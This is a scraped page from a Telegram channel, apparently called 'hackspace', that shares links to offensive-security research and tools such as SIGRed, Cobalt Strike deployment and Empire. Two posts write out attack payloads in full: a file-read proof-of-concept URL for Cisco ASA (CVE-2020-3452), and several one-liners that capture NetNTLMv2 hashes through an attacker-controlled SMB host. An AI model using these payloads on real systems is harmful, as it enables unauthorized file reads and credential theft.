hackspace
@hackspace
165 subscribers
283 photos
82 videos
25 files
1.02K links
hackspace
Download Telegram
About
Blog
Apps
Platform
Join
hackspace
165 subscribers
hackspace
50 views
hackspace
https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/
Check Point Research
SIGRed - Resolving Your Way into Domain Admin: Exploiting a 17 Year-old Bug in Windows DNS Servers - Check Point Research
Research by: Sagi Tzadik Introduction DNS, which is often described as the “phonebook of the internet”, is a network protocol for translating human-friendly computer hostnames into IP addresses. Because it is such a core component of the internet, there are…
56 views
hackspace
https://itm4n.github.io/cve-2020-1170-windows-defender-eop/
itm4n’s blog
CVE-2020-1170 - Microsoft Windows Defender Elevation of Privilege Vulnerability
Here is my writeup about CVE-2020-1170, an elevation of privilege bug in Windows Defender. Finding a vulnerability in a security-oriented product is quite satisfying. Though, there was nothing groundbreaking. It’s quite the opposite actually and I’m surprised…
57 views
hackspace
GitHub - Q4n/CVE-2020-1362: writeup of CVE-2020-1362
https://github.com/Q4n/CVE-2020-1362
44 views
hackspace
45 views
hackspace
Releases · BC-SECURITY/Starkiller · GitHub
https://github.com/BC-SECURITY/Starkiller/releases
GitHub
Releases · BC-SECURITY/Starkiller
Starkiller is a Frontend for PowerShell Empire. Contribute to BC-SECURITY/Starkiller development by creating an account on GitHub.
52 views
hackspace
GitHub - hlldz/dazzleUP: A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.
https://github.com/hlldz/dazzleUP
GitHub
GitHub - hlldz/dazzleUP: A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates…
A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems. - hlldz/dazzleUP
57 views
hackspace
Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.

For example to read "/+CSCOE+/portal_inc.lua" file.

https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

Happy Hacking!
89 views
hackspace
53 views
hackspace
https://medium.com/@ScatteredSecrets/bcrypt-password-cracking-extremely-slow-not-if-you-are-using-hundreds-of-fpgas-7ae42e3272f6?s=09
Medium
Bcrypt password cracking extremely slow? Not if you are using hundreds of FPGAs!
Building custom FPGA-based hardware to crack bcrypt passwords.
138 views
hackspace
52 views
hackspace
NATO releases Malware Analysis primer


https://ccdcoe.org/library/publications/malware-reverse-engineering-handbook/
49 views
hackspace
Malware_Reverse_Engineering_Handbook.pdf
4.8 MB
Malware_Reverse_Engineering_Handbook.pdf
127 views
hackspace
https://soundcloud.com/queed-inc
SoundCloud
yung innanet
hey kid are you a computer wizard

$xmr = 88JcszMHeaWXn1kc5AqC6xYwaJVrbpy4xRwaCDc1D2W1XvJLNTPVwVxbDch71sVF7JcSKCMDwy8TzHFM9Rn7AXkfQELTf1j

$btc = bc1qk90fg480v0mzvw7m7splyvl8w6zmuu9yy5l3d9
51 views
hackspace
Flipper Zero — Tamagochi for Hackers by Flipper Devices Inc. — Kickstarter
https://www.kickstarter.com/projects/flipper-devices/flipper-zero-tamagochi-for-hackers
Kickstarter
Flipper Zero — Multitool for Hackers
Open source multi-tool device for researching and pentesting radio protocols, access control systems, hardware, and more.
82 views
hackspace
52 views
hackspace
“Exploiting File Upload using Null byte” by Gupta Bless https://link.medium.com/VfjDpqmfD8
Medium
Exploiting File Upload using Null byte
In my previous blog related to FILE upload, I already discussed some basic techniques to bypass whitelisting of file extensions. Now in…
48 views
hackspace
You can steal NetNTLMv2 by changing SMB port:
net use \\IP@80\t
or pdf : /F (\\\\IP@80\\t)
or subdoc : ///IP@80/t
or doc: Target="file://IP@80/t.dotx"
or lnk: URL=file://IP@80/t.htm
50 views
hackspace
https://shells.systems/octopus-v1-0-stable-cobalt-strike-deployment-much-more/
Shells.Systems
Octopus v1.0 stable: Cobalt Strike deployment & much more! - Shells.Systems
Estimated Reading Time: 4 minutes After months of releasing the first version of Octopus, I’m more than glad to announce that the stable version of Octopus is out! During the past few months, I worked with talented people to enhance Octopus capabilities and…
55 views